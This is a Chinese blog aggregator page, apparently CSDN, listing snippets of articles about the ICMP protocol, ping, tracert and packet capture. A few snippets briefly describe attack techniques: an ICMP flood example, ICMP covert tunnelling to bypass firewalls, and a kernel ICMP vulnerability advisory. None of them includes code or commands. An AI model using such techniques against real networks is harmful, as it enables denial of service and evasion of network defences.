各层协议的作用:https://www.cnblogs.com/pengjie-py/p/11256483.htmlTCP/IP 意味着 TCP 和 IP 在一起协同工作。TCP 负责应用软件(比如你的浏览器)和网络软件之间的通信。IP 负责计算机之间的通信。TCP 负责将数据分割并装入 IP 包,然后在它们到达的时候重新组合它们。IP 负责将包发送至接受者。 TCP 详细总结戳:https:...
Icmp高级开发
02-11
非常优秀的Icmp高级开发例子
4.4.2 ICMP的应用举例
engineer0的博客
04-16 832
分组网间探测 ping 用于测试两台主机的连通性 使用 ICMP 回送请求与回送回答报文 是应用层直接使用网络层ICMP的一个例子,没用通过 TCP 或 UDP 有的主机为了防止恶意攻击可能会设定不回复外界发送过来的ICMP请求恢复报文 tracert命令 用来跟踪一个分组从源点到终点的路径 该指令会从源主机向目的主机发送一连串的ip数据报,数据报中封装的是无法交付的UDP用户数据报 1、第一个数据报P1的生存时间TTL设置为1,当P1到达路径上的第一个路由器R1时,路由器R1先接收它,接着把TTL的值.
实例3、研究 ICMP 数据包
weixin_33724659的博客
05-20 703
拓扑图如下: 文件: pka.rar 大小: 34KB 下载: 下载 学习目标了解 ICMP 数据包的格式 使用 Packet Tracer 捕获并研究 ICMP 报文 简介:Wireshark 可以捕获和显示通过网络接口进出其所在 PC 的所有网络通信。Packet Trace...
Linux下ICMP洪水***实例
weixin_33733810的博客
04-03 145
Linux下ICMP洪水***实例原文链接:http://blog.chinaunix.net/uid-25324849-id-215075.html注:所以文章红色字体代表需要特别注意和有问题还未解决的地方,蓝色字体表示需要注意的地方1.本文所介绍的程序平台虚拟机为:Red Hat Enterprise Linux 52.洪水***简介洪水***指的是利用计算机网络技术向目...
ICMP
姜希成的博客
12-22 2万+
网际控制报文协议 ICMP : 为了提高 IP 数据报交付成功的机会,在网际层使用了网际控制报文协议 ICMP (InternetControl Message Protocol)。 ICMP 允许主机或路由器报告差错情况和提供有关异常情况的报告。ICMP 不是高层协议,而是 IP 层的协议ICMP 报文作为 IP 层数据报的数据,加上数据报的首部,组成 IP 数据报发送出去。ICMP 报文的格
vc++网络通讯例子.rar
03-29
这个"vc++网络通讯例子.rar"压缩包很可能是包含了一些使用VC++实现网络通信的示例代码,帮助开发者理解和学习如何在Windows环境下通过C++进行网络编程。 网络通信主要涉及到TCP/IP协议栈,这是互联网通信的基础。在...
易语言测试与指定主机是否能够正常通讯
08-26
在本文中,我们将深入探讨易语言中的"通信测试命令",用于测试与指定主机的通讯是否正常。 易语言的通信测试命令,英文名为"ping",属于网络通信类别,其主要功能是检测程序能否成功地与目标主机建立连接,并获取...
80例上手Delphi7编程(网络与通讯部分源码)
05-02
它基于ICMP协议,展示了如何发送和接收ICMP回显请求,并解析响应数据,为网络诊断提供基础工具。 3. 实例七:NetClock NetClock实例展示如何获取远程服务器的时间,这涉及到网络时间协议(NTP)。通过这个实例,...
boost asio 网络异步 的io 通讯 服务器设计,官方例子
08-31 854
http://www.boost.org/doc/libs/1_46_1/doc/html/boost_asio/examples.html   Examples Allocation This example shows how to customise the allocation of memory associated with asynch
【网络安全】ICMP隐蔽隧道通信与检测
Sun_study的博客
01-17 1459
在一些网络环境中,如果攻击者使用各类上层隧道(例如HTTP隧道,DNS隧道,正反向端口转发等)进行操作均失败。那么可以尝试使用ICMP建立隧道,ICMP协议不需要端口的开放,因为其基于IP工作的,所以我们将其归结到网络层,ICMP消息最为常见的就是ping命令的回复,将TCP/UDP数据包封装到ICMP的ping数据包中,从而穿过防火墙**(通常防火墙是不会屏蔽ping数据包的)**
ICMP协议实现ping的测试
最新发布
要把所有那些负面的信息当做对自身行为的评价,而不是对自身价值的评判。
03-09 582
Internet Control Message Protocol
linux icmp漏洞,Linux kernel icmp_check_sysrq命令执行漏洞(CVE-2016-3707)
weixin_32413167的博客
05-16 139
Linux kernel icmp_check_sysrq命令执行漏洞(CVE-2016-3707)发布日期:2016-06-24更新日期:2016-06-28受影响系统:描述:CVE(CAN) ID: CVE-2016-3707Linux Kernel是Linux操作系统的内核。Linux Kernel kernel.org projects/rt补丁net/ipv4/icmp.c/icmp_c...
ICMP协议解析与实战
恐龙弟旺仔的博客
05-21 4835
1.ICMP协议概述 1.1 什么是ICMPICMP(Internet Control Message Protocol的缩写),中文就是:网际报文控制协议。 该协议是网络协议族的核心协议之一。通过一张图来看下该协议所处位置: (图片来自百度安全验证): 可以看到,ICMP协议与IP协议同属网络层。 虽然两者同属网络层,没有上下级关系,但是ICMP协议最终还是要依靠IP协议将报文发送出去。 1.2 ICMP协议作用 IP协议我们知道是发送数据包的重要协议,实现了数据包的分片发送.
ICMP实例分析
火焰
09-13 4170
发现:在承载ICMP的IP的报文中的协议字段的值是0x01   作为ping命令的原理,自己通过ping同一宿舍的电脑但是失败的报文的场景: ICMP询问报文中的回送请求或回答报文中的回送报文:   A B C D E F G H I J K
ICMP协议详解
热门推荐
honeyJ
05-30 18万+
ICMP协议详解 ICMP协议是一个网络层协议。 一个新搭建好的网络,往往需要先进行一个简单的测试,来验证网络是否畅通;但是IP协议并不提供可靠传输。如果丢包了,IP协议并不能通知传输层是否丢包以及丢包的原因。 所以我们就需要一种协议来完成这样的功能–ICMP协议ICMP协议的功能 ICMP协议的功能主要有: 1. 确认IP包是否成功到达目标地址 2. 通知在发送过程中IP包被...
ICMP数据包-实战分析
Koma的主页
07-13 1万+
昨天有位学习网络编程的兄弟对于TCP/IP里一些协议与概念性的东西很模糊,想让我给他讲解一下ICMP。这不正有空,于是乎随手抓了个ICMP的包给他分析了一下: (前面这些概念性的东西,这是基础的,必看!) ICMP报文包含在IP数据报中,属于IP的一个用户,IP头部就在ICMP报文的前面。所以一个ICMP报文包括IP头部、ICMP头部和ICMP报文(见图表,ICMP报文的结构和几种常见
网络通信基础:ICMP基础通识
HongDaYu的搬砖之路
08-25 3144
前面已经对基础的osi的网络通用模型进行了讲解 所以在知道了什么是OSI的7层网络模型之后,对ping的理解就会更加透彻一些 但是在讲ping包以前会对底层的协议包的组包方式进行了解,同时也算是对基础的一个巩固,做运维的同学会对ping非常熟悉,但是具体的ping你的ping具体是哪一层的通信,估计大家不是很了解。所以今天对此知识进行梳理(因为没梳理之前我也不知道,所以咱们推导一下) ...
网络通讯检测工具:ICMP Ping 测试方法
资源摘要信息: "ping-test.rar文件包含了用于检测网络通讯状态的工具,该工具基于ICMP(Internet Control Message Protocol,互联网控制消息协议协议实现。ICMP通常被用来发送错误消息和操作信息,比如目标不可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值